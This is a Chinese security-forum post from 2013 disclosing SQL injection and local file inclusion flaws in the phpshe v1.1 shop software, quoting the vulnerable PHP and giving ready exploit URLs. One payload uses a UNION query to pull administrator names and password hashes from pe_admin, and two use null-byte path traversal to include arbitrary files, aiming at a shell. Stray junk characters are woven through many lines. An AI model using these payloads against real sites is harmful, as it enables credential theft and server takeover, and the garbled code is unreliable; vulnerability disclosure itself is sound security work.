找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2236|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-19 19:01:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/
8 t* \$ R8 Q- q) j; @* v5 k/* Phpshe v1.1 Vulnerability% M' C5 V6 O( d& a; O
/* ========================1 ~- s0 X  ~( x1 ^1 C
/* By: : Kn1f3' C9 `; W2 G' r  @
/* E-Mail : 681796@qq.com4 n' i# k1 l7 J2 \1 J& N0 C" ~% Z
/*******************************************************/
" ~$ U( Z4 B/ R( B. ^0×00 整体大概参数传输  _) t* E( J1 g0 `: L8 M: e4 u$ I
9 \4 f% I/ p  v; n

9 {2 O. F0 R  y0 b6 [0 f' _9 v2 ]: j( B% O. m: N
//common.php
9 J, ]$ L, [) r9 Yif (get_magic_quotes_gpc()) {9 U9 {# j+ D( b
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');; H$ L, Y* l# ?/ {
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
) r3 o( {6 {0 C7 Q" z8 {}+ A! M7 C2 \* l  S% w9 A5 S0 G
else {
$ D6 V; x4 n# U!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
  S! r# K7 p# e5 w2 P% F!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
! Y1 U9 D$ @* Q) x( O' L; {  Y}4 T: v0 X5 ]9 x( W/ E8 R& A  t9 O! }
session_start();
+ F. ?4 p4 R+ d4 S& l3 }1 \% e!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
# ~! b4 [2 s- @  w, a7 u!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
) P  B; B+ Y0 R3 N: y& ?( y5 q1 V
( d- V/ F5 V# m& G" X9 W0×01 包含漏洞
3 l; S" C4 q! I4 l' E5 C 5 ^5 O+ T* A! @$ G0 @
: b) H& B2 Q! ]0 U3 r
//首页文件
! O; q* ]" m9 z* ?& f& J2 b' B% N- U<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);) `" S) Z5 o+ R8 \. x
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞. J9 W& @/ F! }' w1 g* I
pe_result();
; Y# y4 R8 j. G4 G2 k5 ^?>
$ ]1 X" u3 O; y7 o3 N  i//common 文件 第15行开始
% h7 L7 N  e' Wurl路由配置
0 p  c3 b3 M! g2 m" d* L5 C$module = $mod = $act = 'index';
( e2 U1 r. J! e' z' D' Y5 F8 b$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);3 ?4 M  b0 H$ \7 o8 U1 x
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
; u2 [; \) |4 f$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);  H4 ~1 z9 s$ G% O5 i3 z
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
  j$ E0 r/ w* f6 m2 V

/ i5 Y+ L/ S% v/ `
9 U6 F# D5 g$ ?9 E; \+ C
0×02 搜索注入
  |( Q4 b. U7 U3 T4 u3 y
5 }2 x/ Y- a/ I! b) }6 Y<code id="code2">

//product.php文件1 I  h, n/ h1 s
case 'list':
- ~' t% k7 l4 a' X$ N& W* a2 ]$category_id = intval($id);
" t, Z. \9 @- z1 E/ G! Z. w$info = $db->pe_select('category', array('category_id'=>$category_id));
7 p* q: y& z2 |. H( a  p3 t! d  ]//搜索, `' u; E) `4 i
$sqlwhere = " and `product_state` = 1";
, R( F2 ^1 C! w, s: B6 M5 tpe_lead('hook/category.hook.php');
3 M+ q5 O) q3 n, Zif ($category_id) {* Y* f. w. g$ S& v6 ^- Y, l2 f
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
- c% R7 k$ G4 N% |8 s}
3 `2 y; [, G  P7 q) v$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
3 C4 o- O3 u& Q( y5 m5 R3 cif ($_g_orderby) {
( ~# B! t+ F+ _4 l! l, Y$ I- ~" C$orderby = explode('_', $_g_orderby);; }: a. h& l' |- {( H: A3 _
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
0 `% L. j! u1 r# T4 U, u- ?$ r8 X}4 ~" E+ S& s- c. r3 i# x
else {; {" D7 O4 y2 c6 s& i9 `% R) [% u; |
$sqlwhere .= " order by `product_id` desc";% ~2 S! Y& i3 Y+ m- {
}
9 l, e5 B2 n* t. B. y. _: F$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));/ V. y9 p6 W  i* N
//热卖排行; x9 }& j, Q8 _9 Y# x
$product_hotlist = product_hotlist();0 @% x6 T1 J6 W/ j2 ^
//当前路径
. C, B+ M' s% p$nowpath = category_path($category_id);
9 B1 Q$ u0 g" V3 d: T$seo = pe_seo($info['category_name']);
/ S4 ]6 t  [& uinclude(pe_tpl('product_list.html'));: ?# t  j5 T8 C( _/ {+ s
//跟进selectall函数库4 H: ?9 P; A+ H3 M: t, D
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())5 Q! N4 h5 {/ a
{
; P+ C! d$ K" W8 b7 e! H2 N7 E% W//处理条件语句
8 U5 y# y% k9 ~  l4 A9 J' P8 k( R$ z$sqlwhere = $this->_dowhere($where);: G( C4 n; O6 ]* c7 N
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
' |) V1 e. G" Y' J' l% F}4 P7 R( w0 U7 p* \
//exp" D- p7 M7 ?+ Z: m
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1( p; H2 y" t1 J6 j

</code>" M! K1 v. Z5 a% }% O4 x4 N

7 E5 ~9 V+ k1 [0 H0×03 包含漏洞2
. ^+ w" D; F; p/ b" A
9 i% H* ]5 u# ]& S9 e<code id="code3">

//order.php

case 'pay':


% b0 K/ E, b6 w; p8 \$order_id = pe_dbhold($_g_id);


" Q+ X3 \7 ?+ `2 [- C$cache_payway = cache::get('payway');

3 |3 i0 |: J* E0 |
foreach($cache_payway as $k => $v) {

# v8 x1 [/ {/ G+ D: Z# [2 l
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


" u: d7 O" t" N$ k3 dif ($k == 'bank') {


6 ^( m6 S8 t2 E+ e2 x+ ^$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


( Q9 _) s. F: b5 w+ ^: i}


/ l- A/ P0 o0 \7 {( D}

1 U+ J9 T  D3 H& ]; v4 A( J
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

5 J# H' c: O" {# s+ m8 {% P5 p
!$order['order_id'] && pe_error('订单号错误...');

, H, L/ ?. L/ m9 Y- ^) n  L/ b9 g; e
if (isset($_p_pesubmit)) {


- v% r5 ]; g* n6 \# L9 e% ~if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

. o0 ?. q  k8 O- z3 D) J
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


' t1 K8 W$ |1 |; K+ Hforeach ($info_list as $v) {


7 I% b0 Q/ V) U, l! ?; i- ]$order['order_name'] .= "{$v['product_name']};";& T) M0 X3 \7 d! z3 |8 b3 i4 O


! t- u6 K4 O$ C5 V) Y0 w}

/ h3 K, `: }( \9 U( ?1 ^5 t
echo '正在为您连接支付网站,请稍后...';

, B% x4 H( ~+ I  D  x+ @
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


  U+ J: x2 u" b* ~( L& s2 X}//当一切准备好的时候就可以进行"鸡肋包含了"

% _  h# _; \/ q+ l: \1 L0 T6 b
else {

( r8 O2 G+ C3 c( a
pe_error('支付错误...');


) b  I6 P& V" M( [2 p% u}

6 f* N4 I- x& t3 r* `
}

% |/ ?# p8 ~& q6 ]* p$ Y
$seo = pe_seo('选择支付方式');

- l0 {8 X& o: m. b# m# x
include(pe_tpl('order_pay.html'));


4 J3 m7 |' F- f6 X0 z% `# F8 P; |break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>1 ?9 e; b, ]/ \& o$ x

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表